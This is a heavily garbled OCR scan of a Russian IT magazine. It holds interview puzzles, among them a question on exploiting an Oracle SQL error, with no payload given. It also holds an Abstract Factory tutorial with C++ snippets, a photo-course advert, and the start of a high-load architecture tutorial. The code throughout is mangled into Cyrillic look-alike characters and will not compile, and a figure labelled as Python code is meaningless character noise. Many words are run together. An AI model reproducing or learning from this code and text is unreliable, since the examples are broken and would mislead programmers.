Примечание: вместо свеклы взадачке могутфигурировать огур- 
цы, грибы, репа, арбуз и прочие фрукты/овощи. Кому что по вкусу. 

3. При обследовании веб-приложения вы обнаружили уведомление 
обошибке:«ЕРРОРа(Ііпе 15:ОРА-01790:ехргез5Іоп тизіЬаѵе 
зате с1а(а(уре аз соггезропсііпд ехргеззіоп». 
Чтоприводиткпоявлениюэтойошибки?Свидетельствуетли 
приведенная ошибка о наличии уязвимости в приложении? Если 
ошибкаявляетсяуязвимостью,токакиедействия вы предпримете 
для ее эксплуатации? Если вы считаете, что это уязвимость, то как 
будет выглядеть ваше уведомление об уязвимости? 

4. Как определить, есть ли в односвязном списке циклы и с каких 
элементовони начинаются? 
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ОТБОРНЫЕ ПРОДУКТЫ 

СО ВСЕГО МИРА* 



Мыэшем,і№омнре№Йіі^хамы&л/4ш^ 
ІІіІЫіІ Вызнсвтчшршжѳтена^^іікрядамкііаамарк^ 



Реклама 



кодинг 



сІееопІ5 (сІееопІБЙдтаіІ.сот) 




ПАТТЕРН 



«АБСТРАКТНАЯ ФАБРИКА» 



СОЗДАЕМ ОБЪЕКТЫ 
КЛАССОВ ЛЕГКО 
И С УЛЫБКОЙ 



редставим, что мы занимаемся разработкой некой системы, 
в которой есть такое понятие, как пользовательский аккаунт. 
На начальном этапе разработки у нас был задуман всего один 
тип аккаунта. Пользователи могли заходить в систему, выполнять 
некоторые действия и так далее. О каждом пользователе мы хранили 
немного информации, например логин, пароль, имя. Исходя из этого 
код класса, который описывал юзера, выглядел примерно так. 




в объектно-ориентированном программиро- 
вании понятие классов — основа основ. У них 
есть конструкторы и деструкторы, которые 
позволяют выполнять определенные действия 
при инициализации и уничтожении объек- 
тов классов. Казалось бы, что тут еще можно 
придумать? Но в сложных системах зачастую 
базовых механизмов для конструирования 
объектов классов бывает недостаточно. Спе- 
циально для таких случаев был придуман 
паттерн «Абстрактная фабрика». 



Класс поль зовательского аккаунта 

СІЭ55 Цзег 



риЫіс : 

и5ег(5І:гіп^ 1о§іп^ 5І;гіп§ разБыогсІ) 

: ш Іо^іп( іо^іп). гп_ра55ыогсІ(ра55ыогсІ) 

{ 

Ь 

~Ц5ег() ; 

5І;гіп§ ^е1:Іо^ іп(^ { геііигп т_1о§іп : } 

5І:гіп§ ^еІі Ра зБыогсІС) { геііигп ш р аББыогсІ: } 



ѵоісі Бе1:Іо^іп(БІ:гіп^ Іо^іп) { ш Іо^і п = 1о§іп; } 
ѵоісі БѲІ:РаББШгсІ(БІ:гіп§ раББШгсІ^ { т_раББыогсІ = раББыогсІ; } 



// ... 

ргіѵаііе: 

БІігіп^ ш Іо^іп; 
Біігіп^ ш раББыогсІ: 
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Паттерн «Абстрактная фабрика» 



Все просто и понятно. Конструктор класса ІІзег принимает не- 
сколько параметров, таких как Іодіп, раззѵѵогсі и так далее. Вся эта 
информация передается в конструктор извне, например из базы 
данных. Код, который создает пользователя, встречается в на- 
шей программе в нескольких местах, но это всего одна строчка, 
и поэтому на заре развития проекта все хорошо и приятно. 

Но мы развиваемся дальше, исходники пухнут, а функциональ- 
ных фишек становится все больше. Вместе с ростом сложности 
системы растет и количество юзеров, которые ею пользуются, и мы 
понимаем, что нам нужны администраторские учетные записи, 
чтобы управлять теми сотнями, если не тысячами людей, которые 
активно используют наш проект. 

Первое, что приходит в голову, — это создать отдельный класс 
и назвать его как-нибудь типа АсІтіпІІзег. Код его будет такой. 

Класс администраторского аккаунта 

АсІтіпІ Ізег 

{ 

риЫіс : 

Ас ІтіпІІзег (зіігіп^ 1о§іп^ з1:гіп§ раззыогсі) 

: т іо^іп (іо^іп) . т_раз5ыогсІ(ра55ыогсІ) 

О; 

~АсІтіпи5ег( ) : 



// Код методов ^еіХХХ и зеіХХХ идентичен 
// коду из класса ІІзег 



// Другой код, специфичный для админского аккаунт а 



ргіѵаііе: 

зігіп^ т іо^іп; 

зігіп^ т раззыогсі : 

} 

Если внимательно присмотреться к реализации класса 
АсІтіпІІзег, то мы не увидим практически никакой разницы по 
сравнению с Узег. Более того, клиентский код, создающий объект 
пользователя, очень красноречиво говорит нам, что срочно нужно 
увеличивать уровень присутствия ООП в этой архитектуре. 

Код создания экземпляров классов пользователей 

сопзі іпі 5ІМРІЕ Ц5ЕК = 1: 

СОП5І: ІПІ: АРМІМ Ц5ЕК = 2 ; 



ІПІ: изегТуре: 
зігіп^ Іо^іп; 
зігіп^ раззыогсі: 



// Инициализация переменных изегТуре. Іо^іп. раззыогсі 





і-р (изегТ ѵре == 5ІМР ІЕ Ц5ЕК) 



ІІзег изег(1о§іп. раззыогсі); 

і 

еізе і-Р (изегТѵре == АРМІМ ІІ5ЕК’) 

і 

АсІтіпІІзег изе гРІо^іп. раззыогсі); 

} 

Даже невооруженным глазом можно заметить, что тут нужно 
вводить базовый класс, от которого уже будут наследоваться наши 
админы и юзеры. В этом случае мы устраним дублирование кода 
и облегчим работу клиентам данных классов. Им достаточно будет 
объявить указатель на ВазеУзег и создать нужный объект, все 
остальное за них сделает полиморфизм. Что из этого всего выйдет, 
можно увидеть в следующем куске кода. 




Диаграмма классов паттерна «Абстрактная фабрика» 



Классы пользовательских аккаунтов и их создание 
сіазз ЦзегВазе 

і 

риЫіс : 

Цзег(з1;гіп§ 1о§іп^ з1;гіп§ раззыогті) 

: т_1о§іп(1о§іп) ^ т_раззыогс1(раз5ырг^) 

_ { 

ь 

~Ц5ег() ; 



ѵігіиаі з ігіп^ ^еіІо^іп П { геіигп тіо^іп; } 

ѵігіиаі зіг іп^ ^еіРа ззыогсІП { геіигп т раззыогсі: } 



зе1:Іо§іп(з1:гіп§ 1о§іп) { т_1о§і п = 1о§іп; } 
зе1:РаззыогсІ(з1:гіп§ раззмргйХ { 
т раззыогсі = раззыогсі: } 



// ... 



ргіѵаіе: 

з1:гіп§ т іо^іп: 
зігіп^ т раззыогсі: 
} 



сіазз ІІзег : з иЫіс ЦзегВ азе 

{ 

риЫіс : 

ЦзегРзігіп^ Іо^іп. зігіп^ раззыогсП 

: ЦзегВазеЫо^іп . раззыогсП 

{ 

ь 

ѵігіиаі ~ЦзегП : 



// Код, специфичный для обычных пользовательских 

// аккаунтов 

} 



с Іа АсІтіпІІзег : риЫіс ЦзегВазе 

{ 

риЫіс : 

Асітіпизег(з1:гіп§ 1о§іп^ з1:гіп§ раззыогсі), 

: ЦзегВазе(1о§іп. раззыогсі) 

{ 

ъ 

ѵігіиаі ^АсІтіпІІзегП ; 
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ІГН«І 

Сннліт 

щт^ 

Ви«7^(1«ійф^>4гі;>; 

АіГ ріс_иѵі«9йСм1С): 

ігим Л9 -^і1ѴІ4МА»№Е4-Е 

с1^ А4піІвісг№шЕТі;Ь|с|-?|$ 

*1 _1ДЦ: (ісНІІ 

нір.иіій^ *ѣ икд^іыи» 

4шІ ^й_иа:9чі9Е(нЦС|і: 
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Н-Ы4І 
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ніГіМз^ѵе ■! а сйЕ^ 

4гГ 

ПІІѴЙ ПІСкНВЗірі 

ІѴП-Н 

4«Бр«яй сристі си]№дз9а.іш/с 

ІГІГ»Т 
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'сій' :Си 

• ицііш ' 3 іікріш 
I 

■ігг 9с«:_ічіМеІс(»ЁІіС. Еии 'АсГши'}: 

пі-ѵі піеке№^«и*Фкс(ііям 'йі-Ішліс.'ИІ 

Сисзгу ѴйІи.й1сГыисѵ^) 

си - 2шоіС7.№_7^^І*і['си’] 

исрінй №иііГ|.рт(_мМгІіГигрІіі]«^] 

рпт сіг.дѵЕ^_!юітЕЗ л ?-вт 



Пример кода фабрики на РуІЬоп 

// Код, специфичный для админских пользовательских 
// аккаунтов 

і 



// Клиентский код 



ІІ5егВа5е *ц5ег: 

і-р ( изегТѵре == 5ІМРІЕ_и5ЕК) 

{ 

изег = ^5ег(1о§іп^ раББыогсІ); 

еІ5е і-Р (изегТуре == АРМІМ Ц5ЕК) 

{ 

изег = пеы АсІтіпЦ зегРІо^іп. раБЗЫогсІ); 

} 

Новый вариант куда лучше адаптирован к нашей системе. 

Но у нас по-прежнему есть несколько проблем, которые могут 
в будущем сильно усложнить нам жизнь. Во-первых, объекты 
юзер-классов создаются в разных местах программы. Каждый раз 
при создании нам приходится использовать оператор условного 
перехода для проверки, принадлежат ли данные к админскому 
аккаунту, или нет. То есть опять имеет место дублирование кода. 
Более того, если в будущем мы захотим добавить еще один класс 
пользователей, то нам придется искать в исходниках все участки 
кода, где мы создаем наши юзер-объекты, и дополнять их строка- 
ми, создающими этих новых юзеров. Как все мы знаем, такие дей- 
ствия чреваты ошибками, да и вообще смотрится это некрасиво. 
Вторая проблема заключается в том, что конструктор каждого из 



классов (АбтіпІІзег, ІІзег и так далее) может принимать различные 
параметры. Клиент должен знать и помнить, какому классу какие 
данные нужны для успешного создания объекта. Это опять-таки не 
очень хорошая манера кодинга. Чем проще интерфейс взаимодей- 
ствия клиентов с классами, тем надежней наш код. 

Все эти проблемы нам поможет решить «Абстрактная фабрика». 
Суть этого объектно-ориентированного паттерна заключается 
в том, что он инкапсулирует все действия по созданию объектов 
классов. То есть всё, что мы до этого момента делали в разных 
местах программы, нам теперь нужно собрать в одном месте и за- 
ставить это правильно работать. Давайте попробуем. 

Код фабрики 

сіазз ІІ5егРас1:огѵ 

і 

риЫіс : 

// ... 

ЦзегБазе* сгеа1:еи5ег(іп1: изегТуре. 5І:гіп^ Іо^іп. 

5І:гіп§ ра55ыогсІ) 

{ 

ВазеІІзег *ц5ег: 

(изегТуре) 

{ 

сазе АРМІМ Ц5ЕК: 

изег = пеы АсІпііпизег(1о^іп. раззыогсП; 

Ьгеак: 

сазе 5ІМРІЕ Ц5ЕК: 

изег = пеы І Ізег(1о^іп. раззыогсі); 

Ьгеак: 

} 



геііигп изег: 

} 

} 

Итак, что мы сделали? У нас есть класс СІзегРасІогу, который 
в своем арсенале имеет всего один-единственный значимый 
метод — сгеаІеСІзегО. Метод этот, помимо типа пользовательского 
аккаунта, принимает еще и данные, которые нужны для конструи- 
рования объектов. Причем если наборы параметров для создания 
разных юзеров отличаются друг от друга, то фабрика сама вы- 
бираетте, что нужны для криэйта заданного объекта. На выходе 
сгеаІеІІзегО отдает указатель на объект базового типа. 

Все просто и красиво. Вся требуемая для создания аккаунта 
информация собрана в одном месте. Нам легко следить за его 
работоспособностью и дополнять нужными функциями. При этом 
клиенты получаюттоже ряд преимуществ. Им не надо ничего 
знать о конструкторах этих пользовательских классов. Им не надо 
модифицировать свой код при добавлении нового типа пользова- 
теля. А интерфейс фабрики всегда остается неизменным, благо- 
даря чему клиент может сосредоточиться на выполнении своих 
задач. Для большей наглядности можно посмотреть на код, чтобы 
убедиться, насколько все стало просто. 

Использование фабрики классов в клиентском коде 

АсІтіпІІзег *асІтіп: 

ЦзегРасІіогу и-РП : 



асішіп = и-Р. сгеа1;еизег(А0МІМ_и5ЕК^ 1о§іп^ раззыогсі); 

ЗАКЛЮЧЕНИТ 

Фабрики классов широко используются в объектно- 
ориентированном программировании. Любой проект со сложно- 
стью немногим выше минимальной может извлечь достаточно 
весомые преимущества из их применения. Поэтому, если ты 
собираешься начать кодить что-то грандиозное, очень рекомендую 
испробовать фабрики классов у себя в проекте. 
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Оібі(аІРІіо(:о8сПооІ 

Онлайн-фотокурс Вщііаі Ркоіо Зскооі 




Новый формат, 
новые возможности 






[На протяжении девяти лет журнал Рідііаі РИоІо рассказывал читателям о том, что | 
[такое фотография вообще и что такое хорошая фотография в частности; как сде^ 
|лать фотографию своим хобби или профессией; знакомил с творчеством лучших | 
^отечественных и зарубежных фотографов. Они же, в свою очередь, делилисьД 
[практическими навыками и опытом пути от первого нажатия на кнопку затвора 
организации персональных выставок и создания фотоальбомов. Теперь, благодаря 
поддержке компании Затвипд, журнал запускает новый формат взаимодействия с 
^^Іфотолюбителями — образовательные онлайн-курсы Оідііаі РИоІо'зсІіооГ^^І 



Это бесплатный интерактивный интернет- 
курс, подготовленный экспертами журнала 
и фотографами-профессионалами, пройдя 
который вы сможете ознакомиться с раз- 
личными техническими аспектами фотогра- 
фии и получить необходимые навыки рабо- 
ты в разных жанрах. Кроме этого, в рамках 
курса вы сможете узнать о преимуществах 
системных компактных камер на примере 
фототехники линейки 5апі8ин§ КХ. 

Учебный курс разделен на 16 уроков с 
видеороликами, статьями и примерами 
фотографий, а так же заданиями для само- 
стоятельной работы. Победители конкур- 
са, проходившего в мае этого года на сайте 
(1і§і1;а1-р1іо1;о.ги/5СІіоо1/ смогут работать 
непосредственно с преподавателями курса, 
получать консультации по учебной про- 
грамме и экспертную оценку своих фото- 
графий. Впрочем, это не значит, что те. 



кто не успел подать заявки на обучение, 
не смогут найти для себя ничего полезного 
на сайте проекта. Уроки и статьи будут до- 
ступны всем посетителям сайта. 

Дополнительная программа курса вклю- 
чает в себя мастер-классы известных фото- 
графов, работающих в различных жанрах. 
Мастер-классы будут проходить в Москве, 
и всем желающим предоставляется воз- 
можность прослушать интересную лекцию, 
поучаствовать в портфолио-ревю, а также 
поближе познакомиться с фототехникой 
5ат8ип§ и пообщаться с техническим спе- 
циалистом компании. Для тех же, кто не 
сможет посетить эти мероприятия, будут 
подготовлены видеозаписи мастер-классов, 
которые можно будет найти на сайте Вщііаі 
РЬоІо 5сЬоо1. Кроме этого, эти видеозапи- 
си будут регулярно размещаться на ВѴВ- 
приложении к журналу Ві^ііаі РЬоІо. 



По завершении курса ВщКаІ РІіо1;о 5с1іоо1 
в феврале 2013 года в одной из централь- 
ных московских галерей пройдет группо- 
вая выставка, на которой будут представ- 
лены 50 лучших фоторабот слушателей 
курса. 

Все учебные материалы курса Оі§ііа1 
Ркоіо 5скоо1 подготовлены на базе си- 
стемной камеры 5ат$ип§ NX200. На 
ее примере мы будем рассказывать о 
технике фотосъемки. Система 5атшп§ 
NX включает в себя все компоненты, 
необходимые для организации твор- 
ческого процесса и работы фотографа 
в большинстве направлений и жанров. 
При всем этом камера NX200 идеаль- 
но подходит для любительского ис- 
пользования благодаря доступности в 
управлении, легкости и компактности. 



график работы Оі§і1а1 РЬоІо 8сЬоо1 
Учебный курс (8 месяцев) 02.06.2012 — 15.01.2013 
7 мастер-классов 23.06.2012 — 15.12.2012 
Выставка лучших работ учащихся февраль 2013 
01С1ТАГ-РНОТО.Ки/8СНООГ/ 



Реклама 












Каждый программ ист хочет стать лучшим, 
получать все более интересные и сложные 
задачи и решать их все более эффективными 
способами. В мире интернет-разработок 
к та КИМ задачам можно отнести те, 
с которыми сталкиваются разработчики 
высокона груженных систем. 



Большая часть информации, опубликованная 
по теме высоких нагрузок в интернете, 
представляет собой всего л ишь описания 
технических характеристик крупных систем. 
Мы же попробуем изложить принципы, 
по которым строятся архитектуры самых 
передовых и самых посеідаемых интернет- 
проектов нашего времени. 



АКАДЕМИЯ { 



УЧЕБНИК 
по ВЫСОКИМ 



УРОК# 



от АВТОРОВ 

Основным направлением деятельности нашей компании 
является решение проблем, связанныхс высокой нагруз- 
кой, консультирование, проектирование масштабируемых 
архитектур, проведение нагрузочныхтестирований и опти- 
мизация сайтов, в число наших клиентов входят инвесторы 
из России и со всего мира, а также проекты «ВКонтакте», 
«Эльдорадо», «Имхонет», РИоіозідЫі.ги и другие. Во время 
консультаций мы часто сталкиваемся стем, что многие не 
знают самых основ — что та кое масштабирование и каким 
оно бывает, какие инструменты и для чего используются. 
Эта публикация открывает серию статей «Учебник по высо- 
ким нагрузкам». Вэтихстатьяхмы постараемся после- 
довательно рассказать обо всех инструментах, которые 
используются при построении архитектуры высоконагру- 
женных систем. 
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Учебник по высоким нагрузкам. Урок №1 



В РАМКАХ НАШЕГО ЦИКЛАМЫ БУДЕМ ОБЪЯСНЯТЬ, ЗАЧЕМ НУЖЕН ТОТ ИЛИ ИНОЙ 
ИНСТРУМЕНТ, ЧТО ОНУМЕЕТ ДЕЛАТЬ, В ЧЕМ МОЖЕТ ПОМОЧЬ, КАКИЕ ПОДВОДНЫЕ 
КАМНИ МОГУТВОЗНИКНУТЬПРИ ЕГО ИСПОЛЬЗОВАНИИ 



Мы начнем описывать построение архитектуры вы со ко на- 
груженных систем с самых основ. Не будем рассказывать ни о 
каких ноу-хау и постараемся не разделять возможные решения 
на «правильные» и «неправильные». Конечно, у нас есть излю- 
бленные концепции, однако мы планируем дать наиболее пол- 
ное представление о целом наборе приемов, методов, подходов, 
схем и инструментов, которые можно использовать. 

В рамках нашего цикла мы будем объяснять, зачем нужен тот 
или иной инструмент, что он умеет делать, в чем может помочь, 
какие подводные камни могут возникнуть при его использовании, 
куда дальше копать и та к да л ее. 

МОНОЛИТНЫЕ ПРИЛОЖЕНИЯ 
И СЕРВИС-ОРИЕНТИРОВАННАЯ АРХИТЕКТУРА 

Итак, прежде всего нужно определиться с терминологией, чтобы 
правильно ПОН и мать друг друга. Рассмотрим два принципиально 
разных подхода к построению архитектуры веб- проектов. 

Монолитное приложение — это один большой кусок. Такие 
приложения могут работать очень быстро, поскольку в них нет 
никаких оверхедов, связанных с тем, что да иные перегоняются из 
одного блока в другой, от одного сервиса к другому или каким-то 
образом конвертируются. 

Один из самых известных примеров монолитного приложения — 
крупнейший почтовый сервис Сотппипіба^еРго. Во всяком случае, 
несколько лет назад он был монолитным и очень быстро работал. 
Однако он представлял собой немасштабируемое приложение, 
котороетем не менее вполне держало миллион пользователей. 

Оно было написано одним человеком, и в какой-то момент это 
стало проблемой. Подключить новых программистов сравнимого 
уровня оказалось почти невозможным. Это основная беда моно- 
литной архитектуры — большие сложности в масштабируемости 
разработки. Речь идет именно о распараллеливании разработки, а 
нео масштабировании программного решения. 

Гораздо чаще в интернете используется та к называемая сервис- 
ориентированная архитектура. Она подразумевает разделение 
программного обеспечения, сайта на некие сервисы, каждый из 
которыхотвечаетза что-то одно. При этом все сервисы обменивают- 
ся друг с другом данными по определен ному протоколу. 



Монолитное приложение 

Прн№щеннв №бой м^нтиый 

профшмный 

Плюсы; 

« Огсугстйий кбного-либо на 

интдркоммуницдцию сердит 

Минусы; 

- ЗыСйКЁЯ слйжніють ра^іаБйтки. кадры рашаійт вса: 
« □ случае продеты останаалнааетсй шсй; 

* НЁбоаиокшсп. вести раараЕк^тѵу 



Сервис-ориентированная 
архитектура (50А| 

Каждь4Й сервис решает строга 
определенную задачу. Основной минус этого 
подхода заключается в наличии оѳерхеда 
на интер коммуникацию сервисов 
между собой и на обработку АРІ 
взаимодействия между слоями. 



Рассмотрим, например, 
РасеЬоок. Он построен почти клас- 
сически. Естьразличныесервисы, 
каждый из которых реализует 
строгоопределенный наборфунк- 
ций. Кпримеру, служба сообщений 
и ленты новостей (то, что, казалось 
бы, является ядром сети) пред- 
ставляютсобой отдельные сервисы, 
которые тесно интегрированы. 
Возьмем сервис авторизации. Мы 
можем обратиться к нему, передать 
ему кукуй спросить: «Это валидная 
кука? Если валидная, то кому она 
принадлежит?» 

Наверное, одним из самых из- 
вестных проектов, при построении 
которого сервисный подход ис- 
пользуется по максимуму, является 
Агпагоп. Этотбольшой интернет- 
магазин сталкивается сзадачами, 
которые характерны для любого 
крупного проекта. Когда в компа- 
нию пришел новый технический 
директор, он принял гениальное 
решение: «Мы будем делать серви- 
сы!» В результате Агпагоп является 
не только и не столько крупным 
интернет-магазином, сколько 
поставщиком сіоиб-сервисов. 
Теперь при создании какого-либо 
продукта, крупного сайта всегда 
возникаетвопрос: разрабатывать 
ли собственную систему хране- 
ния, или использоватьсистему от 
Атаіоп, которая изначально по- 
строена так, чтобы ее можно было 
купить? 

Один из самых больших плюсов 
сервис-ориентированной архи- 



тектуры — возможность вести рас- 
пределенную разработку. Тут надо 
понимать, что под распределенной 
разработкой имеют в виду вовсе не 
такую разработку, когда члены ко- 
манды находятся в разныхточках 
земного шара — один в Таиланде, а 
другой в Москве. Ситуация намного 
шире. Скажем, вы наняли в Москве 
пятнадцать программистов, а 
шестнадцатого нанять не можете. 
Пока вы нанимаете шестнадцато- 
го, первый ужеувольняется. Или 
другой пример. Когда возникают 
какие-либо ограничения, связан- 
ные с командой, некоторыезадачи 
приходится передаватьаутсорсе- 
рам. И эта другая команда, состоя- 
щая из незнакомых людей, которой 
выуже не можете управлять, 
начинает ком митить что-то прямо 
в ваш репозиторий, тудаже, куда 
и ваши основные девелоперы. Это 
проблема, которую очень сложно 
решить. Именно поэтому «моно- 
литный» подход к монолитному 
приложению осложняет масшта- 
бирование разработки, когда речь, 
допустим, идет о едином РНР- 
п рил ожени и. Например, обычный 
С6І зсгірі в каком-то смысле явля- 
ется монолитным приложением. 
Когда нужно, чтобы этотСбІ зсгір^ 
«пилило» несколько человек, уже 
начинаются трудности. 

Если у вас сервис-ориенти- 
рованная разработка, вы можете 
прийти ксторонней команде 
и сказать: «Ребята, нам надо 
запилить эту штуку. МыАРІпро- 
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АКАДЕМИЯ 



БЕРЕТСЯ МОНОЛИТНОЕ ПРИЛОЖЕНИЕ, РАЗБИВАЕТСЯ НАОТД^ЕЛЬНЫЕ СЕРВИСЫ, 
КАЖДЫЙ ИЗ КОТОРЫХОТВЕЧАЕТЗАСТРОГО ОПРЕДЕЛЕННЫЙ НАБОРЗАДАЧ, ПО- 
СЛЕ ЧЕГО ДЛЯ ЭТИХСЕРВИСОВЗАДАЕТСЯ СПОСОБ КОММУНИКАЦИИ 



промышленный подход 




Разработка 
ин&трумет^ов для 
масштвбироЕншнп 
происходи ш^^альна 
ОТ разрб&отѵ 
логипи прикледлых 
проактав 





Проиышлвнный подход 

- дота ралрабоша общілх ицстр^намтоі, 

* Очень бистрня разработка прнлоошннй - происходит 

Сборка страниц, кек а конструктора іоас: 

< Воэнонтстъ испотьэогатъдлп^рвзработкипрнпомбн^ 
прагрикишетт» сріщней н интй /«алмфннацнн - вѵсокач 
масштабируемость раэрабстки^ 

* Повьшійиньитрвікнамий к алпараптійму обеспечь 



^асеЬоок 



Яндекс Соодіе 



думали, ОНО должно бытьтаким». 

И можно действительно кусок 
вашего приложения отдать на 
раз работку другим людям. Легко 
может оказаться, что задача уже 
давно кем-то решена и доступна в 
виде готового для использования 
решения. 

Проект именно та к и эволю- 
ционирует: берется монолитное 
приложение, разбивается на 
отдельные сервисы, каждый из ко- 
торых отвечает за строго опреде- 
ленный набор задач, после чего 
для этих сервисов задается способ 
коммуникации. Он можетбыть 
каким угодно; от РЕ5Т АРІ по НТТР 
до простых запросов к базе данных. 
Неважно, что именно используется 
в качестве общей шины. 

Другой пример: софт Егіуѵібео, 
разработкой которого занимается 
МаксимЛапшин. Это среднего 
размера софтина на языке про- 
граммирования Егіапд. Писать 
подобные видеостриминговые 
штуки сложнее, чем сайты, потому 



что надо одновременно держать 
в голове множествотонкостей. 
Втакие проекты всегдатрудно 
привлекать людей, а на обучение 
программиста, который бы смог 
написать то, что не сломало бы код 
на п рода кш не при выкатывании, 
нужно минимум пол года. В случае 
с «Эрли видео» та самая проблема 
двух гениев решена инструмен- 
тально. Инструментпомогаетвести 
параллельную разработку в одном 
коде, в одном приложении, в одном 
репозитории. Однако это, скорее, 
исключение из общего правила, 
обусловленное компактностью 
кода. 

РЕМЕСЛЕННЫЙ 
И ПРОМЫШЛЕННЫЙ ПОДХОД 

Условно говоря, существуетдва 
подхода к разработке высоконагру- 
женных систем: ремесленный и про- 
мышленный. В чем разница? В том, 
где разрабатываются средства 
масштабирования — те инстру- 
менты, которые гарантируют, что 
ваша система будет выдерживать 
огромные нагрузки. 

При использовании промышлен- 
ного подхода эти средства разраба- 
тываются отдельно отбизнес-логики. 
При ремесленном подходе средства 
и бизнес-логика разрабатываются 
одновременно. И там, и там имеются 
сервисы. Но в одном случае есть один 
большой слой, который отвечаетза 
то, что все это будет работать. Объ- 
ясним на примере. 

Разработчики боодіе в 
большинстве своем не специали- 
зируются на разработке высо- 
конагруженныхсистем. Еслиу 
кого-нибудь из них спросить; «Как 
ты будешьделать эту систему? Как 
она будетвыдерживать миллионы 
пользователей?», то, скорее всего, 
услышишь: «Это очень просто. Я 
сделаю запрос к системе Ьід сіа^а, 
и она быстро вернетответ». Он не 
знает, что происходитвнутри — ему 
это не надо. Если посмотретьна 
схему, то он работаетна «зеленом» 
уровне и используетуже готовые 
разработки, сделанные отдельной 
командой инженеров, которые 
непосредственнозанимаются вы- 
сокими нагрузками. Такработает 
большинство крупных компаний. 

Хорошим примером прило- 
жения, при разработке которого 
использовался этотподход, может 
послужить 6оод1е+. Это прило- 
жение было создано за со вер- 
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шен но фантастический срок в пару месяцев и принял о на себя, 
наверное, одну из самых чудовищных нагрузок по росту числа 
пользователей за всю историю интернета. 

Аналогичным образом устроено большинство крупных проек- 
тов — РасеЬоок, боодіе, «Яндекс». В «Яндексе» тоже есть эта вол- 
шебная шина данных, ккоторой идутзапросы, и «Яндекс» никогда 
непадаетцеликом,за исключениемтех случаев, когда возникают 
проблемы с дата-центром. В «Яндексе» падаюткуски страниц. 
Почему? Потому что какой-то сервис или какое-то хранилище 
перестает отвечать. Если, например, упал сервис погоды, то на 
главной странице будетотображаться все, кроме погоды. Именно 
притоком подходе одни специалисты отвечают за масштабирова- 
ние, сборку, коммуникацию, а другие программируют, к примеру, 
отображение погоды или курса валют. 

В качестве примера сайта, созданного с использованием 
ремесленного подхода, можно привести «ВКонтакте». Когда для 
«ВКонтакте» разрабатывается какой-либо отдельный сервис, на- 
пример чат, разработчику переда ют все полномочия, специально 
оговаривая, что этот чат дол жен быть масштабируемым. 

Независимо оттого, имеются ли общие примитивы по хра не- 
нию да иных и прочее, в целом разработчик самостоятельно при- 
нимает решения. Он работает не только над самой бизнес-логикой, 
НОИ над ее масштабированием. 

Плюсы и минусы ремесленного подхода интуитивно понятны. 
Если вы хотите использоватьтакой подход, вам опятьже нужны 
очень хорошие, гениальные программисты, вам нужны люди, 
которые досконально разбираются во всехтонкостях, втом, что и 



КРУПНЫЕ КОМПАНИИ ЧАСТО ЯВЛЯЮТСЯ ПИОНЕ- 
РАМИ. ДОПУСТИМ, ОУМАМООВ БЫЛ РАЗРАБОТАН 
В АМАНОМ ДЛЯ МАСШТАБИРОВАНИЯ ИХСОБ- 
СТВЕННОЙ СИСТЕМЫ РАБОТЫ СО СКЛАДОМ 



Ремесленный подход 

Быстра разработка любых ноаых ратаний: 



* Высокие требовэнирі к шлификации разработчиков 

- низкая ыасштабир^мйспъ разраБатнм; 



Максимально эффактивиоа нслстэсваииа 
тахнолдгнй и алгшратжіт обвсгтѳиин 



какработает. Если спросить Павла 
Дурова, сколько человек из его 
команды обладаетнавыками посоз- 
данию вы соконагруженных систем, 
он ответит: «Все!» 

Помимо высоких требований к 
квалификации (что, например, не 
позволитрасшириться вдва-три 
раза), для ремесленного подхо- 
да характернотакже отсутствие 
оверхеда на общую шину, по 
которой гоняются общие данные, 
и максимально полное и эффек- 
тивное использование машинных 



Ремесленный подход 




Бнзнес-лсгикв проект? 
и инкгтрутты для 
иасііггзбира&^шй 
разрябятываютои 
ццжэвреианно, 
учитывая йсобйнижти 
бизнес-логики иметло 
этот проекта 




ресурсов. Когда «ВКонтакте» пару 
лет назад создавал чат по аналогии 
с РасеЬоок, у него, по-моему, было 
всего две-три машины сустанов- 
ленным е)аЬЬегс1-сервером. 

Точно та к же дел о обстоит и с 
поиском. У «ВКонтакте» отдельный 
сервис поиска — очень быстрый, его 
переписывали множество раз. Хотя 
он очень большой, им занимается 
всегонесколькочеловек, кото- 
рые выполняют все необходимые 
операции вручную. Нет никакого ма- 
гического сервиса, которому можно 
сказать: «Отдай индекс и разложи 
его на 100 серверов». Они дела ют это 
сами, руками. 

Что касается повышенных 
требований каппаратному обе- 
спечению, то, есл им ы го воримо 
промышленном подходе, крупному 
бизнесу куда предпочтительнее 
вложить заранее известную сумму, 
пусть даже и очень большую, и 
получить за нее необходимый 
рабочий функционал. Некоторые 
считают, что это слишком дорого. 
Гораздо дешевле будет нанять 
дорогих специалистов, которые 
создадут систему, занимающую не 
тысячу серверов, а только 20. Те, 
кто придерживается этой позиции, 
утверждают, чтотысяча серве- 
ров — это слишком высокая плата 
за безболезненное масштаби- 
рование, поэтому лучше нанять 
людей, которые будутследовать 
ремесленному подходу, используя 
уникальные инструменты. 

Остановимся на еще одном 
немаловажном преимуществе 
ремесленного подхода. Дело в 
том, что крупные компании часто 
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ПАРАМЕТРЫ ЖЕЛЕЗА НЕЛЬЗЯ УВЕЛИЧИВАТЬ 
БЕСКОНЕЧНО. В КАКОЙ-ТО МОМЕНТ СТАНЕТ 
НУЖНАУЖЕ ТЫСЯЧА СЕРВЕРОВ, А ЗАКУПИТЬ 
СТОЛЬКО БУДЕТ НЕВОЗМОЖНО 



являются пионерами. Допустим, ОупатоОВ был разработан в 
Атаіоп для масштабирования их собственной системы работы 
со складом. После появления ОупатоОВ опен со рсным сообще- 
ством бы ли написаны Саззапсіга, Набоор и так далее. Все они 
существуютблагодаря компаниям, использующим ремеслен- 
ный подход, которые нуждаются в собственных сервисах типа 
ОупатоОВ, но не в состоянии разработать их самостоятельно. 
Таким образом, подобный обмен происходит постоянно, боодіе 
создает какое -то новое решение. Это решение опенсорсится, 
потом много раз переписывается, после чего его подхватывают 
десятки компаний, таких как «ВКонтакте», ОеМА(Япония)и 
многие другие. Они делают из этого решения действительно 
качественный софт, которым могут пользоваться все. 

У крупных компаний из-за этого часто возникает предубеж- 
дение, которое можно выразить фразой «Все, что сделано 
не нами, нам не подходит» или «МоНпѵеп^есІ Неге». Крупные 
компании могут себе позволить привлекать профессоров и 
целые университеты, чтобы они вели какое-либо направление. 
Например, боодіе Тгапзіа^е курирует знаменитый профессор, 
по-моему, из Стэнфорда, который всю жизнь занимался теорией 
машинного перевода. Тоже самое происходит и в Мі егозой, и 
других компаниях та кой величины. 

Профессионалы есть в компаниях обоих типов. Но это разного 
рода профессионалы. Профессионалы втехкомпаниях, которые 
практикуютремесленный подход, действительнознают, какие 
